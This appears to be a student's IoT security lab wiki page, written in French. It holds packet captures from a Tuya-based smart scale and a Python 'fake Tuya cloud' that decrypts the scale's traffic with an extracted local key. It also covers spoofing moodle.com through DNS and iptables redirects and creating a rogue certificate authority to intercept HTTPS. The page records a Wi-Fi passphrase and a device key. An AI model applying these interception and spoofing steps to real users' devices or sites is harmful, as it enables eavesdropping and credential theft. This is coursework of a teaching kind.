12:36:41.148741 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4......<\)...........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.161323 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4g.....[.}T..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.167616 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i....P....Y...c....
12:36:41.490919 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i.r.u....).........
12:36:41.993612 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i..HE.....f........
12:36:42.011664 ARP, Request who-has 172.16.10.1 tell 172.16.10.105, length 46
..........|.-L..
i........
.....up. ..........
12:36:42.011672 ARP, Reply 172.16.10.1 is-at 00:16:3e:23:74:42 (oui Unknown), length 28
..........>#tB..
...|.-L..
i
12:36:42.019053 IP 172.16.10.105.3872 > 172.16.10.1.8886: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O>..
i..
.. "....m....`....<........
12:36:42.019100 IP 172.16.10.1.8886 > 172.16.10.105.3872: Flags [R.], seq 0, ack 6510, win 0, length 0
E..(..@.@..E..
...
i".. .......nP.......
12:36:42.070419 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O<..
i..
.B......m....`...........<.
12:36:42.070442 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [S.], seq 3767910189, ack 6510, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..B....-...n`...l.......
12:36:42.077437 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O?..
i..
.B......n....P...4......
..
12:36:42.079986 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.B......n....P...........>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:42.080012 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [.], ack 68, win 64173, length 0
E..(..@.@.....
...
i..B.........P...l...
12:36:42.080447 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@.....
...
i..B.........P...l.........(
12:36:42.080533 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@.....
...
i..B....5....P...l...
12:36:42.101652 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(. ....O<..
i..
.B..........5P...4s........
12:36:42.102116 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(.
....O;..
i..
.B..........5P...4h.....
..
12:36:43.025368 IP 172.16.10.105.23869 > 172.16.10.1.8886: Flags [S], seq 6511, win 4380, options [mss 1460], length 0
E..,......O6..
i..
.]="....o....`............9
12:36:43.025387 IP 172.16.10.1.8886 > 172.16.10.105.23869: Flags [R.], seq 0, ack 6512, win 0, length 0
E..(..@.@..E..
...
i".]=.......pP.......
12:36:44.025225 IP 172.16.10.105.22317 > 172.16.10.1.8886: Flags [S], seq 6513, win 4380, options [mss 1460], length 0
E..,......O5..
i..
.W-"....q....`....+........
12:36:44.025269 IP 172.16.10.1.8886 > 172.16.10.105.22317: Flags [R.], seq 0, ack 6514, win 0, length 0
E..(..@.@..E..
...
i".W-.......rP.......
12:36:45.025301 IP 172.16.10.105.31465 > 172.16.10.1.8886: Flags [S], seq 6517, win 4380, options [mss 1460], length 0
E..,......O4..
i..
.z."....u....`...ck......E.
12:36:45.025318 IP 172.16.10.1.8886 > 172.16.10.105.31465: Flags [R.], seq 0, ack 6518, win 0, length 0
E..(..@.@..E..
...
i".z........vP....0..
12:36:46.025500 IP 172.16.10.105.9070 > 172.16.10.1.8886: Flags [S], seq 6521, win 4380, options [mss 1460], length 0
E..,......O3..
i..
.#n"....y....`.............
12:36:46.025517 IP 172.16.10.1.8886 > 172.16.10.105.9070: Flags [R.], seq 0, ack 6522, win 0, length 0
E..(..@.@..E..
...
i".#n.......zP.......
12:36:47.033189 IP 172.16.10.105.51179 > 172.16.10.1.8886: Flags [S], seq 6527, win 4380, options [mss 1460], length 0
E..,......O2..
i..
...".........`...._......y.
12:36:47.033206 IP 172.16.10.1.8886 > 172.16.10.105.51179: Flags [R.], seq 0, ack 6528, win 0, length 0
E..(..@.@..E..
...
i"...........P...?$..
12:36:47.263020 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.287049 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.653641 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4B...................
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.663352 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4.L.......p..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.674677 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i>#tB./..P.........
12:36:48.993649 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
ir...P.............
12:36:49.311055 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:49.490922 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i.......x....D.....
12:36:49.492262 ARP, Reply 172.16.10.105 is-at a4:e5:7c:16:2d:4c (oui Unknown), length 46
..........|.-L..
i..>#tB..
...................
12:36:49.515651 IP 172.16.10.105.29415 > 172.16.10.1.8886: Flags [S], seq 6536, win 4380, options [mss 1460], length 0
E..,......O...
i..
.r.".........`...kZ........
12:36:49.515669 IP 172.16.10.1.8886 > 172.16.10.105.29415: Flags [R.], seq 0, ack 6537, win 0, length 0
E..(..@.@..E..
...
i".r.........P.......
12:36:49.518628 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [S], seq 6539, win 4380, options [mss 1460], length 0
E..,......O-..
i..
.z]..........`.............
12:36:49.518648 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [S.], seq 1378912894, ack 6540, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..z]R0.~....`...l.......
12:36:49.523505 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O0..
i..
.z]......R0..P........a3.tu
12:36:49.527055 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.z]......R0..P...G?......>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:49.527081 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [.], ack 68, win 64173, length 0
E..(..@.@..X..
...
i..z]R0......P...l...
12:36:49.527462 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@..P..
...
i..z]R0......P...l.........(
12:36:49.527530 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@..V..
...
i..z]R0......P...l...
12:36:49.569636 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(......O...
i..
.z]......R0..P..........C.@
12:36:49.574893 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(......O-..
i..
.z]......R0..P..........
..
12:36:50.310055 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i........ ....>....
12:36:53.526624 IP 172.16.10.105.48314 > 172.16.10.1.8886: Flags [S], seq 6547, win 4380, options [mss 1460], length 0
E..,......O&..
i..
...".........`...!|........
12:36:53.526669 IP 172.16.10.1.8886 > 172.16.10.105.48314: Flags [R.], seq 0, ack 6548, win 0, length 0
E..(..@.@..E..
...
i"...........P...JA..
12:36:54.536817 IP 172.16.10.105.44185 > 172.16.10.1.8886: Flags [S], seq 6567, win 4380, options [mss 1460], length 0
E..,......O%..
i..
...".........`...1.........
12:36:54.536835 IP 172.16.10.1.8886 > 172.16.10.105.44185: Flags [R.], seq 0, ack 6568, win 0, length 0
E..(..@.@..E..
...
i"...........P...ZN..
12:36:55.545631 IP 172.16.10.105.26626 > 172.16.10.1.8886: Flags [S], seq 6589, win 4380, options [mss 1460], length 0
E..,......O$..
i..
.h.".........`...v
........
12:36:55.545649 IP 172.16.10.1.8886 > 172.16.10.105.26626: Flags [R.], seq 0, ack 6590, win 0, length 0
E..(..@.@..E..
...
i".h.........P.......
12:36:56.554680 IP 172.16.10.105.16244 > 172.16.10.1.8886: Flags [S], seq 6611, win 4380, options [mss 1460], length 0
E..,......O#..
i..
.?t".........`.............
12:36:56.554698 IP 172.16.10.1.8886 > 172.16.10.105.16244: Flags [R.], seq 0, ack 6612, win 0, length 0
E..(..@.@..E..
...
i".?t........P....G..
^C
57 packets captured
57 packets received by filter
0 packets dropped by kernel
</syntaxhighlight>port 8886 chez tuya ?

<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 00 00 00 00 d6aG91IFR1eV....
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 00 ...:..BAohBAohb.
0010 - 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 00 00 00 00-00 00 00 00 00 00 00 00 d6aG............
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>trouver un mdp dans l'appli nedis /data/data/com.nedis.smartlife/shared_prefs

decouverte de tinytuya : https://github.com/jasonacox/tinytuya<syntaxhighlight lang="python3">
import socket
import tinytuya
import json

LOCAL_KEY = '674d29fb978a1705'

IP_BALANCE = '172.16.10.105'

print(f"[*] Démarrage du Faux Cloud Tuya...")
print(f"[*] Clé utilisée : {LOCAL_KEY}")

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(('0.0.0.0', 8886))
server_socket.listen(1)

print("[*] En attente de la balance sur le port 8886...")
print("[*] Monte sur la balance maintenant !")

while True:
try:
client, addr = server_socket.accept()
print(f"\n[+] Connexion reçue de {addr[0]} !")

data = client.recv(4096)

if data:
print(f"[i] {len(data)} octets reçus (chiffrés). Tentative de décodage...")

try:
d = tinytuya.OutletDevice('DUMMY_ID', IP_BALANCE, LOCAL_KEY)
d.set_version(3.3) # Version standard WiFi

decrypted = d._decode_payload(data)

if decrypted:
print("\n" + "="*40)
print("donnés :")
print("="*40)
parsed = json.loads(decrypted)
print(json.dumps(parsed, indent=4))

if 'dps' in parsed:
print("\nVALEURS :")
for k, v in parsed['dps'].items():
print(f"- Data Point {k} : {v}")
print("="*40)
else:
print("[-] Échec du décryptage (Format inconnu ou clé incorrecte pour ce paquet)")

except Exception as e:
print(f"[-] Erreur de décodage : {e}")

client.close()

except KeyboardInterrupt:
print("\nArrêt.")
break
except Exception as e:
print(f"Erreur serveur : {e}")
</syntaxhighlight>

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-11T15:26:10Z

Vdetrez : /* Redirection par DNS */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

